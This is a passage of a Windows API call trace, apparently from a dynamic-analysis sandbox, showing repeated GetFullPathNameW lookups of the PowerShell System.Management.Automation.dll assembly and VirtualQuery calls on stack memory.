	[0427.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.208] VirtualQuery (in: lpAddress=0x18b5b0, lpBuffer=0x18c470, dwLength=0x30 | out: lpBuffer=0x18c470*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.208] VirtualQuery (in: lpAddress=0x18b640, lpBuffer=0x18c500, dwLength=0x30 | out: lpBuffer=0x18c500*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.208] VirtualQuery (in: lpAddress=0x18b5b0, lpBuffer=0x18c470, dwLength=0x30 | out: lpBuffer=0x18c470*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.208] VirtualQuery (in: lpAddress=0x18b640, lpBuffer=0x18c500, dwLength=0x30 | out: lpBuffer=0x18c500*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.445] VirtualQuery (in: lpAddress=0x18b5b0, lpBuffer=0x18c470, dwLength=0x30 | out: lpBuffer=0x18c470*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.445] VirtualQuery (in: lpAddress=0x18b640, lpBuffer=0x18c500, dwLength=0x30 | out: lpBuffer=0x18c500*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.445] VirtualQuery (in: lpAddress=0x18b5b0, lpBuffer=0x18c470, dwLength=0x30 | out: lpBuffer=0x18c470*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.445] VirtualQuery (in: lpAddress=0x18b640, lpBuffer=0x18c500, dwLength=0x30 | out: lpBuffer=0x18c500*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.447] VirtualQuery (in: lpAddress=0x18c050, lpBuffer=0x18cf10, dwLength=0x30 | out: lpBuffer=0x18cf10*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.449] VirtualQuery (in: lpAddress=0x18c050, lpBuffer=0x18cf10, dwLength=0x30 | out: lpBuffer=0x18cf10*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0427.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
